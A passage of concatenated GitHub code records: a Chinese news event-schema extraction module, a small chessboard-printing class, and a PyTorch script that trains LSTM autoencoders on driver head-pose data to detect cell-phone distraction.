OUTPUT_INDEX)\n","repo_name":"cmigpereira/technical-docs-bot","sub_path":"build_db.py","file_name":"build_db.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"620021291","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport io\nimport json\nimport requests\n# from ltp_class import HIT_LTP\nimport model_loading as mdld\nimport uuid\nfrom time_utils import timestamp_to_date,current_time\nimport fixativedomain_loading as fdld\nimport logging.config\n\nlogging.config.fileConfig(\"logging.conf\")\nlogging = logging.getLogger('main')\n\nclass Event_Supervision():\n\n def __init__(self):\n # MODELDIR = 'ltp_data_v3.4.0'\n # self.hit_ltp = HIT_LTP(MODELDIR)\n self.ner_type = ['mg', 'gg', 'st', 'hy', 'bg', 'nr', 'nt', 'rw', 'fss', 'jj', 'hgzb', 'zczt', 'hylx', 'zqgs']\n self.neg_sub = ['公司', '该公司', '我省', '记者', '这']\n self.neg_v = ['获悉','截止','如下','显示','有','满','工作','共有','没','是','远离','称','说','表示','认为','指出','强调']\n logging.info(\"Event_Supervision initial ... 
\")\n\n # 从不同的接口获取 event schema\n def get_event_schema_(self,doc):\n # doc = json.loads(line)\n info_id = doc['id']\n publishAt = doc['publishAt']\n title = doc['title'].strip()\n abstract = doc['abstract'].strip()\n\n logging.info(\"title: {}\".format(title))\n logging.info(\"abstract: {}\".format(abstract))\n\n att_eventype_flag = 0\n # 考虑 event_type, scope, source 事件类型、(篇章级、句子级),(资讯、研报、公告)\n # 首先固定域篇章级\n\n # 篇章级过完再过句子级\n title_ = self.semantic_clean(title)\n title_ = title.replace(\" \", \"。\").replace(\"\\t\", \"。\").replace(\";\", \"。\").replace(\";\", \"。\").replace(\",\",\n \"。\").replace(\n \",\", \"。\").replace(\" \", \"。\")\n abstract_ = self.semantic_clean(abstract)\n abstract_ = abstract_.replace(\" \", \"。\").replace(\"\\t\", \"。\").replace(\";\", \"。\").replace(\";\", \"。\").replace(\",\",\n \"。\").replace(\n \",\", \"。\").replace(\" \", \"。\")\n s_list = abstract_.split(\"。\") + title_.split(\"。\")\n schemas = []\n # 先进行篇章级的抽取,篇章级无法抽取的再进一步进行句子级别或者开放域的抽取;该部分认为一篇文章可以有多个篇章级固定域类型\n schemas = fdld.extract_schema.get_schema_article(doc)\n\n if len(schemas) > 0:\n for item in schemas:\n # pass\n ners = []\n schema_info = {}\n schema_id = str(uuid.uuid1()).replace('-', '')\n createAt = current_time()\n schema_info['id'] = schema_id\n schema_info['infoId'] = info_id\n schema_info['content'] = abstract\n schema_info['paragraph'] = abstract\n schema_info['extractScope'] = \"固定域篇章级\"\n schema_info['schemaType'] = item[1]\n schema_info['sourceType'] = \"资讯\"\n schema_info['schema'] = item\n schema_info['ners'] = ners # 此处ner怎么获取,或者也是用ltp包来获取ner,或者是对提取出来的schema进行ner识别\n schema_info['publishAt'] = publishAt\n schema_info['occurAt'] = publishAt\n # schema_info['createAt'] = createAt\n # schema_info['deleteFlag'] = \"0\"\n # schema_info['humanFlag'] = \"0\"\n\n if schemas != []:\n return schemas\n # 篇章级抽取的输入为整个文章信息,句子级别的抽取输入为某一个句子\n for s in s_list:\n\n TMP = self.get_standard_datetime(s, publishAt)\n\n if len(s.strip()) < 6: # 太短的句子不做处理\n # continue\n # 固定域句子级抽取\n # 直接调用schema抽取的服务\n # fixativedomain_url = ''\n # schema_param = {}\n # schema_param['s'] = s\n # schema_param['publishAt'] = publishAt\n # schema_param = json.dumps(schema_param).encode('UTF-8')\n # response = requests.post(url=fixativedomain_url,data = schema_param)\n # schema_response = response.json()\n schema_response = fdld.extract_schema.get_schema_sen(s,publishAt)\n\n # 得到返回的一句话所有的schema列表后,遍历得到每一个schema,然后给schema加上相对应的句子外部信息\n if len(schema_response) > 0:\n for item in schema_response:\n # pass\n ners = []\n schema_info = {}\n schema_id = str(uuid.uuid1()).replace('-', '')\n createAt = current_time()\n schema_info['id'] = schema_id\n schema_info['infoId'] = info_id\n schema_info['content'] = s\n schema_info['paragraph'] = abstract\n schema_info['extractScope'] = \"固定域句子级\"\n schema_info['schemaType'] = item[1]\n schema_info['sourceType'] = \"资讯\"\n schema_info['schema'] = item\n schema_info['ners'] = ners #此处ner怎么获取,或者也是用ltp包来获取ner,或者是对提取出来的schema进行ner识别\n schema_info['publishAt'] = TMP\n schema_info['occurAt'] = TMP\n # schema_info['createAt'] = createAt\n # schema_info['deleteFlag'] = \"0\"\n # schema_info['humanFlag'] = \"0\"\n schemas.append(schema_info)\n\n att_eventype_flag += 1\n\n\n # 开放域句子级抽取(如果固定域不论篇章级还是句子级抽取过,则开放域都不抽取)\n if att_eventype_flag == 0:\n # 首先过滤掉句式复杂的或对于事件描述模糊的句子\n if not self.s_filter(s):\n # 利用自己领域的分词 + ltp 的 parser\n s_seg = self.split_sentence(s)\n # 开放域抽取的前提是句子中必须出现 ner\n ori_ner_info = [seg for seg in s_seg if seg['nature'] in ['ns', 'nt', 'nr'] or len(\n set(seg['ner'].split(',')) & 
set(self.ner_type)) > 0]\n if len(ori_ner_info) == 0:\n continue\n # print(222222222222222222222)\n # TMP = self.get_standard_datetime(s, publishAt)\n # print(3333333333333333333333333333)\n s_seg = mdld.hit_ltp.std_seg_with_hanlp(s,\n hanlp_terms=s_seg) # 需要利用 hanlp 分词 + ltp 词性 进行 dp parser\n s_seg = self.special_entity_merge_segment(s, s_seg) # 处理 《》、()等语义完备的实体词\n words = [term['word'] for term in s_seg]\n postags = [term['nature'] for term in s_seg]\n result = mdld.hit_ltp.get_parser_triple(s, words=words, postags=postags)\n core_words_info = result['core_words_info']\n triple_info = result['triple_info']\n ner_info = result['ner_info']\n core_words = [item['word'] for item in core_words_info]\n for triple in triple_info:\n if self.triple_filter(triple, ori_ner_info): # triple 过滤条件\n continue\n if triple['triple'][1] in core_words:\n schema_info = {}\n schema = [{\"name\": triple['triple'][0],\n \"oriName\": triple['triple'][0],\n \"necessary\": 1,\n \"spanStart\": None,\n \"type\": \"Sub\"},\n {\"name\": triple['triple'][1],\n \"oriName\": triple['triple'][1],\n \"necessary\": 1,\n \"spanStart\": None,\n \"type\": \"v\"},\n {\"name\": triple['triple'][2],\n \"oriName\": triple['triple'][2],\n \"necessary\": 1,\n \"spanStart\": None,\n \"type\": \"Obj\"}]\n # ners = ori_ner_info\n ners = []\n for item in ori_ner_info:\n ner = {}\n ner['name'] = item['word']\n ner['type'] = item['nature']\n ner['spanStart'] = item['offset']\n ner['oriName'] = item['realName']\n ner['necessary'] = 1\n ners.append(ner)\n\n schema_id = str(uuid.uuid1()).replace('-', '')\n createAt = current_time()\n schema_info['id'] = schema_id\n schema_info['infoId'] = info_id\n schema_info['content'] = s\n schema_info['paragraph'] = abstract\n schema_info['extractScope'] = \"开放域句子级\"\n schema_info['schemaType'] = triple['triple'][1]\n schema_info['sourceType'] = \"资讯\"\n schema_info['schema'] = schema\n schema_info['ners'] = ners\n schema_info['publishAt'] = TMP\n schema_info['occurAt'] = TMP\n # schema_info['createAt'] = createAt\n # schema_info['deleteFlag'] = \"0\"\n # schema_info['humanFlag'] = \"0\"\n schemas.append(schema_info)\n\n logging.info(\n \"triple: 【{}】-【{}】-【{}】-sentene:{}\".format(triple['triple'][0], triple['triple'][1],\n triple['triple'][2], s))\n logging.info(\"ners: {}\".format([x['name'] for x in ners]))\n logging.info(\"TMP: {}\".format(timestamp_to_date(int(TMP)).split(' ')[0]))\n\n return schemas\n\n\n # 因为之前调用已经是一篇文章一篇文章进行调用,所以此处希望对一篇文章的相关信息传入,然后进行相关的schema提取\n def get_event_schema(self, data_file_):\n c = 0\n schemas = []\n with io.open(data_file_, \"r\", encoding='utf-8') as f:\n while True:\n line = f.readline()\n if len(line) > 0 and c < 10:\n c+=1\n print(c)\n schemas = self.get_event_schema_(line)\n\n else:\n break\n \n print(len(schemas))\n return schemas\n \n def get_articlevel_eventype(self, title, abstract):\n \n return ''\n \n \n def get_senlevel_eventype(self, s):\n \n return ''\n \n def triple_filter(self, triple, ner_info):\n if triple['triple'][0] == \"\": # 主语缺失不为事件\n return 1\n if triple['triple'][0] in self.neg_sub:\n return 1\n if triple['triple'][1] in self.neg_v:\n return 1\n \n # 如果主语或宾语中不包含 ner,进行过滤\n condition = 0\n sub_obj = triple['triple'][0]+triple['triple'][1]\n ners = [x['word'] for x in ner_info]\n for ner in ners:\n if ner in sub_obj:\n condition += 1\n break\n if condition == 0:\n return 1\n return 0\n \n # 去 “电” 头、去括号、【】 等,用于事件抽取\n def semantic_clean(self, text):\n '''\n # 可能是开头,也可能是结尾,所以需要判断索引位置\n # 理论上一个新闻 text 中只会存在一个 “电头” \n features = 
['日电','日讯','日消息','日报道','网讯','网消息']\n for fea in features:\n if fea in text:\n fea_ids = text.index(fea)\n if fea_ids < int(1/2 * len(text)):\n text = text[fea_ids+len(fea):]\n break\n '''\n # 剔除掉 ()、() 中的 “不规范信息”\n special_signs = [\"(\", \"(\", \"【\", \"[\", '<']\n signs_infos_list = self.get_special_chunk(text)\n for item in signs_infos_list:\n if item['type'] in special_signs:\n text = text.replace(item['chunk_str'], '')\n return text\n \n # 抽取出 text 中所有的 special sign string 及 offset\n def get_special_chunk(self, text):\n signs_infos_list = []\n special_signs = [['(', ')'], ['(', ')'], ['<','>'],['《', '》'], ['【', '】'],['[',']'],['{','}'],\n ['「', '」'], ['‘', '’'], ['\\\"', '\\\"'],['“', '”'], ['\\'', '\\'']]\n special_signs_rgx_info = []\n for i in range(0,len(special_signs)):\n rgx = re.compile(r'[{0}](.*?)[{1}]'.format(special_signs[i][0],special_signs[i][1]))\n type = special_signs[i][0]\n temp_dic = {}\n temp_dic['rgx'] = rgx\n temp_dic['type'] = type\n special_signs_rgx_info.append(temp_dic)\n for x in special_signs_rgx_info:\n item = x['rgx']\n type = x['type']\n item_rgx = item.finditer(text)\n if item_rgx is not None:\n for m in item_rgx:\n signs_infos = {}\n signs_infos['offset'] = m.span()\n signs_infos['chunk_str'] = m.group(0)\n signs_infos['type'] = type\n signs_infos_list.append(signs_infos)\n return signs_infos_list\n\n def special_entity_merge_segment(self, s, segs):\n signs_infos_list = self.get_special_chunk(s)\n words_info = {}\n for sign_info in signs_infos_list:\n offset_start = sign_info['offset'][0]\n words_info[offset_start] = {}\n words_info[offset_start]['chunk_str'] = sign_info['chunk_str']\n words_info[offset_start]['offset_end'] = sign_info['offset'][1]\n words_info[offset_start]['type'] = sign_info['type']\n segs_ = []\n new_word = None\n end_offset = None\n for seg in segs:\n offset_start = seg['offset']\n if offset_start == end_offset:\n new_word = None\n end_offset = None\n if offset_start in words_info and end_offset is None:\n new_word = words_info[offset_start]['chunk_str']\n seg['word'] = new_word\n seg['offset'] = offset_start\n seg['nature'] = 'n'\n segs_.append(seg)\n end_offset = words_info[offset_start]['offset_end']\n if new_word is None:\n segs_.append(seg)\n return segs_\n\n def s_filter(self, s):\n features = ['格隆汇','龙虎榜', '罚决字', '丨', '|','?', \n ':', '【','[','!',':', '!','?']\n for fea in features:\n if fea in s:\n return 1\n # 利用词法句法分析初步判断哪些句子“语义不完备”主要为缺失主语\n terms = self.split_sentence(s)\n nature_list = [term['nature'] for term in terms]\n # 这、也、并、且、和、及、以及\n if len(nature_list) > 0:\n if nature_list[0].startswith(('c', 'd', 'r')):\n return 1\n condition = 0\n # 默认为句子长度,因为 存在 增持 nz,且假设句子成立必须存在谓词\n v_idx = len(nature_list)\n for i in range(len(nature_list)):\n if nature_list[i].startswith('v'):\n v_idx = i\n break\n for nature in nature_list[0: v_idx]:\n if 'n' in nature:\n condition += 1\n break\n if condition ==0:\n return 1\n return 0\n \n def split_sentence(self, sen):\n nlp_url = 'http://hanlp-nlp-service:31001/hanlp/segment/segment'\n try:\n cut_sen = dict()\n cut_sen['content'] = sen\n cut_sen['customDicEnable'] = True\n data = json.dumps(cut_sen).encode(\"UTF-8\")\n cut_response = requests.post(nlp_url, data=data, headers={'Connection':'close'})\n cut_response_json = cut_response.json()\n return cut_response_json['data']\n except Exception as e:\n logging.exception(\"Exception: {}\".format(e))\n logging.exception(\"hanlp-nlp-service error\")\n logging.exception(\"sentence: {}\".format(sen))\n return []\n \n def 
get_standard_datetime(self, sen, publishAt):\n url = 'http://datetime-featurextract-service:31001/datetime'\n TMP = ''\n try:\n params = dict()\n params['content'] = sen\n params['publishAt'] = publishAt\n params = json.dumps(params).encode(\"UTF-8\")\n response = requests.post(url, data=params, headers={'Connection':'close'})\n response_json = response.json()\n except Exception as e:\n logging.exception(\"Exception: {}\".format(e))\n logging.exception(\"get_standard_datetime error\")\n return publishAt\n for item in response_json:\n if item['type'] == 'TMP':\n TMP = item['time_stamp'][0]\n return TMP\n for item in response_json:\n TMP = item['time_stamp'][0]\n return TMP\n return TMP\n \n def release(self):\n mdld.hit_ltp.release()\n \n \n \n \nif __name__ == '__main__':\n \n event_supervision = Event_Supervision()\n \n s = '8月全国乘用车市场共售出新车156.4万辆'\n s = '

7月25日午间公告,公司董事会沉痛公告,近日从独立董事梁烽先生家属获知,梁烽先生因病不幸逝世。梁烽先生现任公司第一届董事会独立董事、审计委员会主任委员。\n    \n    梁烽先生去世后,公司董事会成员减少至8人,其中独立董事减少至2人,导致公司董事会中独立董事所占比例低于1/3,根据相关法律、法规规定,公司董事会将尽快按照相关程序增补新的独立董事并及时公告。在新的独立董事选举产生之前,公司独立董事事务暂由陈汉亭先生、彭丽霞女士两位独立董事履行。\n    \n    习近平指出,这是最后一个晚上

'\n result = []\n\n abstract_info = {}\n abstract_info['id'] = '121313123123'\n abstract_info['title'] = '光弘科技独立董事梁烽先生逝世'\n abstract_info['publishAt'] = '1571919900476'\n abstract_info['abstract'] = s\n\n result.extend(event_supervision.get_event_schema_(abstract_info))\n print(result)\n # TMP = event_supervision.get_standard_datetime(s, 1546272000000)\n #\n # print(TMP)\n #\n #\n # event_supervision.release()\n \n \n \n \n \n \n \n \n \n \n pass","repo_name":"cwgong/eventengine-schemextract1-timetl-service","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":19910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"3286443441","text":"class ChessBoard:\n \"\"\"\n This class makes chessboard by defining two parameters:\n _____________\n\n - width (number of chessboard cells in row)\n - height (number of chessboard cells in height)\n\n \"\"\"\n\n def __init__(self, width: int, height: int):\n self.__width = width\n self.__height = height\n\n def print_chessboard(self):\n \"\"\" This function prints chessboard\"\"\"\n\n res = ''\n\n # creating output row\n # default chessboard has even number of cells\n for i in range(0, self.__width):\n if i % 2: # number of cell pairs equal quantity of even numbers, counting by width index\n res = res + '█░' # '█░' - one cell pair\n\n # if number of cells is odd - we must add '█'\n if self.__width % 2 != 0:\n res = res + '█'\n # тест не читает все принты. аппендь в функцию!!!!!!!!!!!!!!!!!!!!!!\n # cycle of creating chessboard\n for i in range(0, self.__height):\n # if number of cells is even, cycle adds '░' in the beginning and removes last cell\n if i % 2 and self.__width != 0:\n print('░' + res[:self.__width - 1])\n else:\n # if number of cells is odd - cycle prints original row\n print(res)\n\n\nif __name__ == \"__main__\": # pragma: no cover\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('width', type=int, help='Defines width of chessboard.')\n parser.add_argument('height', type=int, help='Defines height of chessboard.')\n try:\n args = parser.parse_args()\n t = ChessBoard(args.width, args.height)\n t.print_chessboard()\n except:\n parser.print_help()\n","repo_name":"paivazov/elementary_tasks","sub_path":"chess_board(Task_1)/chess_board.py","file_name":"chess_board.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"30338038359","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom numpy import genfromtxt\r\nimport pandas as pd\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nfrom torchvision import datasets\r\nfrom torch.utils.data import ConcatDataset, TensorDataset, Dataset, DataLoader, random_split \r\nimport torch.optim as optim\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.cluster import SpectralClustering\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\nimport os\r\nos.chdir(\"U:\\Research Projects\\FHWA-EAR\\RetinaFace\")\r\n\r\n# read in data\r\nlist_of_EventTable = ['eventID', 'anonymousParticipantID', 'eventStart', \r\n 'secondaryTask1', 'secondaryTask1StartTime', 'secondaryTask1EndTime', \r\n 'secondaryTask2', 'secondaryTask2StartTime', 'secondaryTask2EndTime',\r\n 'secondaryTask3', 'secondaryTask3StartTime', 'secondaryTask3EndTime']\r\norig_data = 
pd.read_excel('EventTableFull.xlsx', usecols = list_of_EventTable)\r\n\r\n# only work on cell phone use\r\nmask_bool1 = []\r\nmask_bool2 = []\r\nmask_bool3 = []\r\nfor i in orig_data.secondaryTask1:\r\n mask_bool1.append('Cell' in i)\r\nfor i in orig_data.secondaryTask2:\r\n mask_bool2.append('Cell' not in i)\r\nfor i in orig_data.secondaryTask3:\r\n mask_bool3.append('Cell' not in i)\r\nmask_bool1 = pd.array(mask_bool1, dtype = 'boolean')\r\nmask_bool2 = mask_bool2\r\nmask_bool3 = mask_bool3\r\n\r\norig_data.loc[np.arange(0, len(mask_bool2))[mask_bool2], 'secondaryTask2StartTime'] = 0\r\norig_data.loc[np.arange(0, len(mask_bool2))[mask_bool2], 'secondaryTask2EndTime'] = 0\r\norig_data.loc[np.arange(0, len(mask_bool3))[mask_bool3], 'secondaryTask3StartTime'] = 0\r\norig_data.loc[np.arange(0, len(mask_bool3))[mask_bool3], 'secondaryTask3EndTime'] = 0\r\n\r\nlist_of_EventTable.remove('secondaryTask1')\r\nlist_of_EventTable.remove('secondaryTask2')\r\nlist_of_EventTable.remove('secondaryTask3')\r\n\r\norig_data_cell = orig_data.loc[mask_bool1, list_of_EventTable].to_numpy()\r\norig_data = orig_data.loc[:, list_of_EventTable].to_numpy()\r\n#% extract normal and abnormal events from the whole folder\r\nos.chdir(\"U:\\Research Projects\\FHWA-EAR\\RetinaFace\\RetinaFaceData\")\r\nlist_of_filenames = os.listdir(\"./\") \r\n\r\n#% extract distracted events\r\nid_list = list(orig_data_cell[:, 0])\r\npitch_abnormal = []\r\nyaw_abnormal = []\r\nroll_abnormal = []\r\nnormalmax = 90\r\nstepnum = 0\r\nfor i in list_of_filenames: # index from retina face folder\r\n stepnum += 1 \r\n num = int(i.split('_')[3]) # detach the index id\r\n try:\r\n rowID = list(id_list).index(num) # match the eventID in EventTable.csv\r\n # read first secondary task\r\n if orig_data_cell[rowID, 3] > 0:\r\n starttime = orig_data_cell[rowID, 3]\r\n endtime = orig_data_cell[rowID, 4] \r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n distractrange = np.arange(temp_data.shape[0])[(temp_data[:, 3] > starttime) & (temp_data[:, 3] < endtime)]\r\n if len(distractrange) > normalmax:\r\n pitch_abnormal.append(temp_data[distractrange, 0])\r\n roll_abnormal.append(temp_data[distractrange, 1])\r\n yaw_abnormal.append(temp_data[distractrange, 2])\r\n # read second secondary task\r\n if orig_data_cell[rowID, 5] > 0:\r\n starttime = orig_data_cell[rowID, 5]\r\n endtime = orig_data_cell[rowID, 6] \r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n distractrange = np.arange(temp_data.shape[0])[(temp_data[:, 3] > starttime) & (temp_data[:, 3] < endtime)]\r\n if len(distractrange) > normalmax:\r\n pitch_abnormal.append(temp_data[distractrange, 0])\r\n roll_abnormal.append(temp_data[distractrange, 1])\r\n yaw_abnormal.append(temp_data[distractrange, 2])\r\n # read third secondary task\r\n if orig_data_cell[rowID, 7] > 0:\r\n starttime = orig_data_cell[rowID, 7]\r\n endtime = orig_data_cell[rowID, 8] \r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n distractrange = np.arange(temp_data.shape[0])[(temp_data[:, 3] > starttime) & (temp_data[:, 3] < endtime)]\r\n if len(distractrange) > normalmax:\r\n pitch_abnormal.append(temp_data[distractrange, 0])\r\n roll_abnormal.append(temp_data[distractrange, 1])\r\n yaw_abnormal.append(temp_data[distractrange, 2]) \r\n except ValueError:\r\n flag = 
0\r\n\r\n# also extract normal events\r\nid_list = list(orig_data[:, 0])\r\npitch_normal = []\r\nyaw_normal = []\r\nroll_normal = []\r\nnormalcount = 0\r\nnormalrange = np.arange(0, normalmax)\r\nfor i in list_of_filenames: # index from retina face folder\r\n stepnum += 1 \r\n num = int(i.split('_')[3]) # detach the index id\r\n try:\r\n rowID = list(id_list).index(num) # match the eventID in EventTable.csv\r\n # read first secondary task\r\n if orig_data[rowID, 3] == 0:\r\n temp_data = pd.read_csv(i, delimiter = ',', usecols = ['Pitch', 'Roll', 'Yaw', 'frameTime'])\r\n temp_data = temp_data.to_numpy()\r\n if temp_data.shape[0] > normalmax:\r\n normalcount += 1\r\n pitch_normal.append(temp_data[normalrange, 0])\r\n roll_normal.append(temp_data[normalrange, 1])\r\n yaw_normal.append(temp_data[normalrange, 2]) \r\n except ValueError:\r\n flag = 0\r\n \r\n#% some descriptive plots\r\nlen_abnormal = np.zeros(len(pitch_abnormal))\r\nfor i in range(len(pitch_abnormal)):\r\n len_abnormal[i] = len(pitch_abnormal[i])\r\n\r\nplt.hist(len_abnormal, bins = np.arange(0, 150, 5))\r\n\r\n#%% generate sliding windows\r\nstep = normalmax\r\ndef sliding_window(datas, steps = 2, width = step):\r\n win_set=[]\r\n for event in range(len(datas)):\r\n for i in np.arange(0, len(datas[event]), steps):\r\n temp = datas[event][i : i + width]\r\n if temp.shape[0] == width:\r\n win_set.append(temp)\r\n return win_set\r\n\r\npitch_abnormal_window = np.array(sliding_window(pitch_abnormal))\r\nroll_abnormal_window = np.array(sliding_window(roll_abnormal))\r\nyaw_abnormal_window = np.array(sliding_window(yaw_abnormal))\r\npitch_normal_window = np.array(sliding_window(pitch_normal))\r\nroll_normal_window = np.array(sliding_window(roll_normal))\r\nyaw_normal_window = np.array(sliding_window(yaw_normal))\r\n\r\ndata_normal_window = np.zeros((pitch_normal_window.shape[0], pitch_normal_window.shape[1], 3))\r\ndata_normal_window[:, :, 0] = pitch_normal_window\r\ndata_normal_window[:, :, 1] = roll_normal_window\r\ndata_normal_window[:, :, 2] = yaw_normal_window\r\n\r\ndata_abnormal_window = np.zeros((pitch_abnormal_window.shape[0], pitch_abnormal_window.shape[1], 3))\r\ndata_abnormal_window[:, :, 0] = pitch_abnormal_window\r\ndata_abnormal_window[:, :, 1] = roll_abnormal_window\r\ndata_abnormal_window[:, :, 2] = yaw_abnormal_window\r\n\r\ndata_full_window = np.concatenate([data_normal_window, data_abnormal_window], axis = 0)\r\nlabel_full = np.concatenate((np.zeros(data_normal_window.shape[0]), np.ones(data_abnormal_window.shape[0])))\r\n\r\nnon_missing_idx = ~np.isnan(data_full_window).any(axis=1).any(axis=1)\r\ndata_full_window = data_full_window[non_missing_idx, :, :]\r\nlabel_full = label_full[non_missing_idx]\r\n\r\ndata_full_window = np.divide((data_full_window-np.min(data_full_window)), (np.max(data_full_window)-np.min(data_full_window)))\r\n\r\n## shuffle data\r\nidx = np.arange(data_full_window.shape[0])\r\nnp.random.seed(2022)\r\nnp.random.shuffle(idx)\r\ntrain_window = data_full_window[idx, :, :]\r\nlabel_full = label_full[idx]\r\ntrain_window = torch.tensor(train_window, dtype = torch.float32)\r\nlabel_full = torch.tensor(label_full, dtype = torch.int)\r\n\r\ntrain_window_, val_window_ = train_test_split(train_window, test_size = 0.2, random_state = 2022)\r\ntrain_label_, val_label_ = train_test_split(label_full, test_size = 0.2, random_state = 2022)\r\ntrain_data_class = TensorDataset(train_window_, train_label_)\r\ntest_data_class = TensorDataset(val_window_, val_label_)\r\ntrain_loader_class = 
\r\n#%% define LSTM auto-encoder\r\nclass Lstm_encoder(nn.Module):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.lstm1 = nn.LSTM(input_size=normalmax, hidden_size=16)\r\n        self.lstm2 = nn.LSTM(input_size=16, hidden_size=4)\r\n\r\n    def forward(self, x):\r\n        # reshape x to fit the input layout of the LSTM\r\n        x = x.permute(0, 2, 1)\r\n        output, hn = self.lstm1(x)\r\n        output, (hidden, cell) = self.lstm2(output)\r\n        # output contains every timestep, while hidden contains only the last one\r\n        hidden = hidden.repeat((output.shape[0], 1, 1))\r\n        return hidden\r\n\r\nclass Lstm_decoder(nn.Module):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.lstm1 = nn.LSTM(input_size=4, hidden_size=16)\r\n        self.lstm2 = nn.LSTM(input_size=16, hidden_size=normalmax)\r\n\r\n    def forward(self, x):\r\n        # no reshape needed on the way in\r\n        output, hn = self.lstm1(x)\r\n        output, hn = self.lstm2(output)\r\n        # reshape the output back to (batch, width, channel)\r\n        output = output.permute(0, 2, 1)\r\n        return output\r\n\r\nclass net(nn.Module):\r\n    def __init__(self, *args):\r\n        super().__init__()\r\n        # one encoder/decoder pair per pose channel (pitch, roll, yaw)\r\n        self.Lstm_encoder1 = args[0]\r\n        self.Lstm_decoder1 = args[1]\r\n        self.Lstm_encoder2 = args[2]\r\n        self.Lstm_decoder2 = args[3]\r\n        self.Lstm_encoder3 = args[4]\r\n        self.Lstm_decoder3 = args[5]\r\n\r\n    def forward(self, x):\r\n        output1 = self.Lstm_encoder1(x[:, :, 0].unsqueeze(2))\r\n        output1 = self.Lstm_decoder1(output1)\r\n        output2 = self.Lstm_encoder2(x[:, :, 1].unsqueeze(2))\r\n        output2 = self.Lstm_decoder2(output2)\r\n        output3 = self.Lstm_encoder3(x[:, :, 2].unsqueeze(2))\r\n        output3 = self.Lstm_decoder3(output3)\r\n        output = torch.cat((output1, output2, output3), dim = 2)\r\n        return output\r\n\r\n#% model functions\r\ndef train(model, device, train_loader, optimizer, epoch):\r\n    model.train()  # switch to training mode\r\n    for batch_idx, data in enumerate(train_loader):\r\n        data = data.to(device)\r\n        optimizer.zero_grad()\r\n        output = model(data)\r\n\r\n        # accumulate the per-sample reconstruction loss\r\n        loss = 0\r\n        for i in range(data.shape[0]):\r\n            loss += F.mse_loss(output[i], data[i], reduction='mean')\r\n\r\n        #loss = F.mse_loss(output, data)\r\n        loss.backward()\r\n        optimizer.step()\r\n        # print progress every 10 batches\r\n        if batch_idx % 10 == 0:\r\n            print('Train Epoch: {} ... Batch: {} ... Loss: {:.8f}'.format(epoch, batch_idx, loss.item()))\r\n\r\ndef test(model, device, test_loader):\r\n    model.eval()  # switch to evaluation mode\r\n    test_loss = 0\r\n    with torch.no_grad():\r\n        for data in test_loader:\r\n            data = data.to(device)\r\n            output = model(data)\r\n            # accumulate the mean loss of each batch\r\n            test_loss += F.mse_loss(output, data, reduction='mean').item()\r\n\r\n    test_loss /= len(test_loader)  # average over batches so the printed value matches its label\r\n    print('------------------- Test set: Average loss: {:.4f} ... Samples: {}'.format(test_loss, len(test_loader.dataset)))\r\n
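\r\n# Added shape sanity check (illustrative, not part of the original script):\r\n# the three per-channel encoder/decoder pairs should reconstruct the input\r\n# window shape exactly.\r\n_probe = net(Lstm_encoder(), Lstm_decoder(), Lstm_encoder(), Lstm_decoder(), Lstm_encoder(), Lstm_decoder())\r\nassert _probe(torch.zeros(4, normalmax, 3)).shape == (4, normalmax, 3)\r\n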
\r\n#% model training\r\n# the same split as in the classification section (identical random_state), recreated for the auto-encoder loaders\r\ntrain_window_, val_window_ = train_test_split(train_window, test_size = 0.2, random_state = 2022)\r\n\r\ntrain_label_, val_label_ = train_test_split(label_full, test_size = 0.2, random_state = 2022)\r\n\r\ntrain_loader = torch.utils.data.DataLoader(train_window_, batch_size = 256, shuffle = True)\r\ntest_loader = torch.utils.data.DataLoader(val_window_, batch_size = 256, shuffle = False)\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n# model = net(Lstm_encoder(), Lstm_decoder())\r\nmodel = net(Lstm_encoder(), Lstm_decoder(), Lstm_encoder(), Lstm_decoder(), Lstm_encoder(), Lstm_decoder())\r\nmodel = model.to(device)\r\n\r\noptimizer = optim.Adam(model.parameters(), lr = 0.00001)\r\n\r\n# optimizer = torch.optim.SGD(model.parameters(), lr = 0.0001, momentum = 0.9)\r\n\r\nepochs = 500\r\n\r\nfor epoch in range(1, epochs + 1):\r\n    train(model, device, train_loader, optimizer, epoch)\r\n    test(model, device, test_loader)\r\n\r\n#%% unsupervised clustering\r\ndef model_embedding(model, input):\r\n    model.eval()\r\n    with torch.no_grad():\r\n        output0 = model.Lstm_encoder1(input[:, :, 0].unsqueeze(2))\r\n        output1 = model.Lstm_encoder2(input[:, :, 1].unsqueeze(2))\r\n        output2 = model.Lstm_encoder3(input[:, :, 2].unsqueeze(2))\r\n        output = torch.cat((output0, output1, output2), dim = 2)\r\n        output = output.to('cpu').numpy()\r\n    return output\r\n\r\nflag = False\r\n\r\nfor data in test_loader:\r\n    data = data.to(device)\r\n    output_ = model_embedding(model, data)\r\n    if not flag:\r\n        output = output_.copy()\r\n        flag = True\r\n    else:\r\n        output = np.concatenate([output, output_])\r\n\r\n# NOTE: flag is reset here, so the loop below overwrites the test-set embeddings\r\n# gathered above; everything downstream therefore works on embeddings of\r\n# train_window_ only, which is what train_label_ refers to\r\nflag = False\r\nval_loader = torch.utils.data.DataLoader(train_window_, batch_size = 256, shuffle = False)\r\n\r\nfor data in 